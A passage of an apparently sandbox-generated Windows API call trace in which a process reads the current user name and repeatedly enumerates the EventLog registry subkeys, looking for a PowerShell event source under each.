	[0350.858] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xad458 | out: phkResult=0xad458*=0x33c) returned 0x0
	[0350.858] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad458 | out: phkResult=0xad458*=0x0) returned 0x2
	[0350.858] RegOpenKeyExW (in: hKey=0x300, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xad458 | out: phkResult=0xad458*=0x340) returned 0x0
	[0350.858] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad458 | out: phkResult=0xad458*=0x0) returned 0x2
	[0350.859] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad458 | out: phkResult=0xad458*=0x344) returned 0x0
	[0350.859] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad458 | out: phkResult=0xad458*=0x348) returned 0x0
	[0350.859] RegCloseKey (hKey=0x348) returned 0x0
	[0350.859] RegCloseKey (hKey=0x300) returned 0x0
	[0350.860] RegCloseKey (hKey=0x344) returned 0x0
	[0350.886] CoTaskMemAlloc (cb=0x804) returned 0x1b8ae000
	[0350.887] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8ae000, nSize=0xad668 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xad668) returned 0x1
	[0351.177] CoTaskMemFree (pv=0x1b8ae000) 
	[0351.178] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0351.178] GetUserNameW (in: lpBuffer=0x202920, pcbBuffer=0xad6a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xad6a8) returned 1
	[0351.179] CoTaskMemFree (pv=0x202920) 
	[0351.518] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xad3a8 | out: phkResult=0xad3a8*=0x1cc) returned 0x0
	[0351.518] RegQueryInfoKeyW (in: hKey=0x1cc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xad31c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xad318, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xad31c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xad318*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.518] CoTaskMemFree (pv=0x0) 
	[0351.528] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0351.528] RegEnumKeyExW (in: hKey=0x1cc, dwIndex=0x0, lpName=0x202920, lpcchName=0xad3a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xad3a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.528] CoTaskMemFree (pv=0x202920) 
	[0351.528] CoTaskMemFree (pv=0x0) 
	[0351.528] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0351.528] RegEnumKeyExW (in: hKey=0x1cc, dwIndex=0x1, lpName=0x202920, lpcchName=0xad3a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xad3a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.528] CoTaskMemFree (pv=0x202920) 
	[0351.528] CoTaskMemFree (pv=0x0) 
	[0351.528] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0351.528] RegEnumKeyExW (in: hKey=0x1cc, dwIndex=0x2, lpName=0x202920, lpcchName=0xad3a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xad3a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.528] CoTaskMemFree (pv=0x202920) 
	[0351.528] CoTaskMemFree (pv=0x0) 
	[0351.528] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0351.528] RegEnumKeyExW (in: hKey=0x1cc, dwIndex=0x3, lpName=0x202920, lpcchName=0xad3a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xad3a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.528] CoTaskMemFree (pv=0x202920) 
	[0351.528] CoTaskMemFree (pv=0x0) 
	[0351.528] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0351.528] RegEnumKeyExW (in: hKey=0x1cc, dwIndex=0x4, lpName=0x202920, lpcchName=0xad3a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xad3a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.528] CoTaskMemFree (pv=0x202920) 
	[0351.528] CoTaskMemFree (pv=0x0) 
	[0351.528] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0351.528] RegEnumKeyExW (in: hKey=0x1cc, dwIndex=0x5, lpName=0x202920, lpcchName=0xad3a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xad3a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.528] CoTaskMemFree (pv=0x202920) 
	[0351.529] CoTaskMemFree (pv=0x0) 
	[0351.529] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0351.529] RegEnumKeyExW (in: hKey=0x1cc, dwIndex=0x6, lpName=0x202920, lpcchName=0xad3a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xad3a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.529] CoTaskMemFree (pv=0x202920) 
	[0351.529] CoTaskMemFree (pv=0x0) 
	[0351.529] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0351.529] RegEnumKeyExW (in: hKey=0x1cc, dwIndex=0x7, lpName=0x202920, lpcchName=0xad3a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xad3a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.529] CoTaskMemFree (pv=0x202920) 
	[0351.529] CoTaskMemFree (pv=0x0) 
	[0351.529] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0351.529] RegEnumKeyExW (in: hKey=0x1cc, dwIndex=0x8, lpName=0x202920, lpcchName=0xad3a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xad3a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.529] CoTaskMemFree (pv=0x202920) 
	[0351.529] CoTaskMemFree (pv=0x0) 
	[0351.529] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xad408 | out: phkResult=0xad408*=0x330) returned 0x0
	[0351.529] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad408 | out: phkResult=0xad408*=0x0) returned 0x2
	[0351.529] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xad408 | out: phkResult=0xad408*=0x334) returned 0x0
	[0351.530] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad408 | out: phkResult=0xad408*=0x0) returned 0x2
	[0351.530] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xad408 | out: phkResult=0xad408*=0x338) returned 0x0
	[0351.530] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad408 | out: phkResult=0xad408*=0x0) returned 0x2
	[0351.530] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xad408 | out: phkResult=0xad408*=0x33c) returned 0x0
	[0351.530] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad408 | out: phkResult=0xad408*=0x0) returned 0x2
	[0351.530] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xad408 | out: phkResult=0xad408*=0x340) returned 0x0
	[0351.530] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad408 | out: phkResult=0xad408*=0x0) returned 0x2
	[0351.530] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xad408 | out: phkResult=0xad408*=0x328) returned 0x0
	[0351.530] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad408 | out: phkResult=0xad408*=0x0) returned 0x2
	[0351.531] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xad408 | out: phkResult=0xad408*=0x2fc) returned 0x0
	[0351.531] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad408 | out: phkResult=0xad408*=0x0) returned 0x2
	[0351.531] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xad408 | out: phkResult=0xad408*=0x304) returned 0x0
	[0351.531] RegOpenKeyExW (in: hKey=0x304, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad408 | out: phkResult=0xad408*=0x0) returned 0x2
	[0351.531] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad408 | out: phkResult=0xad408*=0x318) returned 0x0
	[0351.531] RegOpenKeyExW (in: hKey=0x318, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad408 | out: phkResult=0xad408*=0x32c) returned 0x0
	[0351.531] RegCloseKey (hKey=0x32c) returned 0x0
	[0351.531] RegCloseKey (hKey=0x1cc) returned 0x0
	[0351.532] RegCloseKey (hKey=0x318) returned 0x0
	[0351.532] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xad3a8 | out: phkResult=0xad3a8*=0x318) returned 0x0
	[0351.533] RegQueryInfoKeyW (in: hKey=0x318, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xad31c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xad318, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xad31c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xad318*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.533] CoTaskMemFree (pv=0x0) 
	[0351.533] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0351.533] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x0, lpName=0x202920, lpcchName=0xad3a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xad3a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.533] CoTaskMemFree (pv=0x202920) 
	[0351.533] CoTaskMemFree (pv=0x0) 
	[0351.533] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0351.533] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x1, lpName=0x202920, lpcchName=0xad3a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xad3a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.533] CoTaskMemFree (pv=0x202920) 
	[0351.533] CoTaskMemFree (pv=0x0) 
	[0351.533] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0351.533] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x2, lpName=0x202920, lpcchName=0xad3a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xad3a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.533] CoTaskMemFree (pv=0x202920) 
	[0351.533] CoTaskMemFree (pv=0x0) 
	[0351.533] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0351.533] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x3, lpName=0x202920, lpcchName=0xad3a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xad3a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.533] CoTaskMemFree (pv=0x202920) 
	[0351.533] CoTaskMemFree (pv=0x0) 
	[0351.533] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0351.533] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x4, lpName=0x202920, lpcchName=0xad3a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xad3a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.533] CoTaskMemFree (pv=0x202920) 
	[0351.533] CoTaskMemFree (pv=0x0) 
	[0351.533] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0351.533] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x5, lpName=0x202920, lpcchName=0xad3a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xad3a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.534] CoTaskMemFree (pv=0x202920) 
	[0351.534] CoTaskMemFree (pv=0x0) 
	[0351.534] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0351.534] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x6, lpName=0x202920, lpcchName=0xad3a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xad3a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.534] CoTaskMemFree (pv=0x202920) 
	[0351.534] CoTaskMemFree (pv=0x0) 
	[0351.534] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0351.534] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x7, lpName=0x202920, lpcchName=0xad3a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xad3a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.534] CoTaskMemFree (pv=0x202920) 
	[0351.534] CoTaskMemFree (pv=0x0) 
	[0351.534] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0351.534] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x8, lpName=0x202920, lpcchName=0xad3a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xad3a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.534] CoTaskMemFree (pv=0x202920) 
	[0351.534] CoTaskMemFree (pv=0x0) 
	[0351.534] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xad408 | out: phkResult=0xad408*=0x1cc) returned 0x0
	[0351.534] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad408 | out: phkResult=0xad408*=0x0) returned 0x2
	[0351.534] RegOpenKeyExW (in: hKey=0x318, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xad408 | out: phkResult=0xad408*=0x32c) returned 0x0
	[0351.534] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad408 | out: phkResult=0xad408*=0x0) returned 0x2
	[0351.535] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xad408 | out: phkResult=0xad408*=0x34c) returned 0x0
	[0351.535] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad408 | out: phkResult=0xad408*=0x0) returned 0x2
	[0351.535] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xad408 | out: phkResult=0xad408*=0x350) returned 0x0
	[0351.535] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad408 | out: phkResult=0xad408*=0x0) returned 0x2
	[0351.535] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xad408 | out: phkResult=0xad408*=0x354) returned 0x0
	[0351.535] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad408 | out: phkResult=0xad408*=0x0) returned 0x2
	[0351.535] RegOpenKeyExW (in: hKey=0x318, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xad408 | out: phkResult=0xad408*=0x358) returned 0x0
	[0351.535] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad408 | out: phkResult=0xad408*=0x0) returned 0x2
	[0351.535] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xad408 | out: phkResult=0xad408*=0x35c) returned 0x0
	[0351.535] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad408 | out: phkResult=0xad408*=0x0) returned 0x2
	[0351.536] RegOpenKeyExW (in: hKey=0x318, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xad408 | out: phkResult=0xad408*=0x360) returned 0x0
	[0351.536] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad408 | out: phkResult=0xad408*=0x0) returned 0x2
	[0351.536] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad408 | out: phkResult=0xad408*=0x364) returned 0x0
	[0351.536] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad408 | out: phkResult=0xad408*=0x368) returned 0x0
	[0351.536] RegCloseKey (hKey=0x368) returned 0x0
	[0351.536] RegCloseKey (hKey=0x318) returned 0x0
	[0351.537] RegCloseKey (hKey=0x364) returned 0x0
	[0351.538] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xad378 | out: phkResult=0xad378*=0x364) returned 0x0
	[0351.538] RegQueryInfoKeyW (in: hKey=0x364, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xad2ec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xad2e8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xad2ec*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xad2e8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.538] CoTaskMemFree (pv=0x0) 
	[0351.538] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0351.538] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x0, lpName=0x202920, lpcchName=0xad378, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xad378, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.538] CoTaskMemFree (pv=0x202920) 
	[0351.538] CoTaskMemFree (pv=0x0) 
	[0351.538] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0351.538] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x1, lpName=0x202920, lpcchName=0xad378, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xad378, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.538] CoTaskMemFree (pv=0x202920) 
	[0351.538] CoTaskMemFree (pv=0x0) 
	[0351.538] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0351.538] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x2, lpName=0x202920, lpcchName=0xad378, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xad378, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.538] CoTaskMemFree (pv=0x202920) 
	[0351.538] CoTaskMemFree (pv=0x0) 
	[0351.538] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0351.538] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x3, lpName=0x202920, lpcchName=0xad378, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xad378, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.538] CoTaskMemFree (pv=0x202920) 
	[0351.538] CoTaskMemFree (pv=0x0) 
	[0351.538] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0351.538] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x4, lpName=0x202920, lpcchName=0xad378, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xad378, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.538] CoTaskMemFree (pv=0x202920) 
	[0351.538] CoTaskMemFree (pv=0x0) 
	[0351.539] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0351.539] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x5, lpName=0x202920, lpcchName=0xad378, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xad378, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.539] CoTaskMemFree (pv=0x202920) 
	[0351.539] CoTaskMemFree (pv=0x0) 
	[0351.539] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0351.539] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x6, lpName=0x202920, lpcchName=0xad378, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xad378, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.539] CoTaskMemFree (pv=0x202920) 
	[0351.539] CoTaskMemFree (pv=0x0) 
	[0351.539] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0351.539] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x7, lpName=0x202920, lpcchName=0xad378, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xad378, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.539] CoTaskMemFree (pv=0x202920) 
	[0351.539] CoTaskMemFree (pv=0x0) 
	[0351.539] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0351.539] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x8, lpName=0x202920, lpcchName=0xad378, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xad378, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.539] CoTaskMemFree (pv=0x202920) 
	[0351.539] CoTaskMemFree (pv=0x0) 
	[0351.539] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xad3d8 | out: phkResult=0xad3d8*=0x318) returned 0x0
	[0351.539] RegOpenKeyExW (in: hKey=0x318, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad3d8 | out: phkResult=0xad3d8*=0x0) returned 0x2
	[0351.539] RegOpenKeyExW (in: hKey=0x364, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xad3d8 | out: phkResult=0xad3d8*=0x368) returned 0x0
	[0351.540] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad3d8 | out: phkResult=0xad3d8*=0x0) returned 0x2
	[0351.540] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xad3d8 | out: phkResult=0xad3d8*=0x36c) returned 0x0
	[0351.540] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad3d8 | out: phkResult=0xad3d8*=0x0) returned 0x2
	[0351.540] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xad3d8 | out: phkResult=0xad3d8*=0x370) returned 0x0
	[0351.540] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad3d8 | out: phkResult=0xad3d8*=0x0) returned 0x2
	[0351.540] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xad3d8 | out: phkResult=0xad3d8*=0x374) returned 0x0
	[0351.540] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad3d8 | out: phkResult=0xad3d8*=0x0) returned 0x2
	[0351.540] RegOpenKeyExW (in: hKey=0x364, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xad3d8 | out: phkResult=0xad3d8*=0x378) returned 0x0
	[0351.540] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad3d8 | out: phkResult=0xad3d8*=0x0) returned 0x2
	[0351.541] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xad3d8 | out: phkResult=0xad3d8*=0x37c) returned 0x0
	[0351.541] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad3d8 | out: phkResult=0xad3d8*=0x0) returned 0x2
	[0351.541] RegOpenKeyExW (in: hKey=0x364, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xad3d8 | out: phkResult=0xad3d8*=0x380) returned 0x0
	[0351.541] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad3d8 | out: phkResult=0xad3d8*=0x0) returned 0x2
	[0351.541] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad3d8 | out: phkResult=0xad3d8*=0x384) returned 0x0
	[0351.541] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad3d8 | out: phkResult=0xad3d8*=0x388) returned 0x0
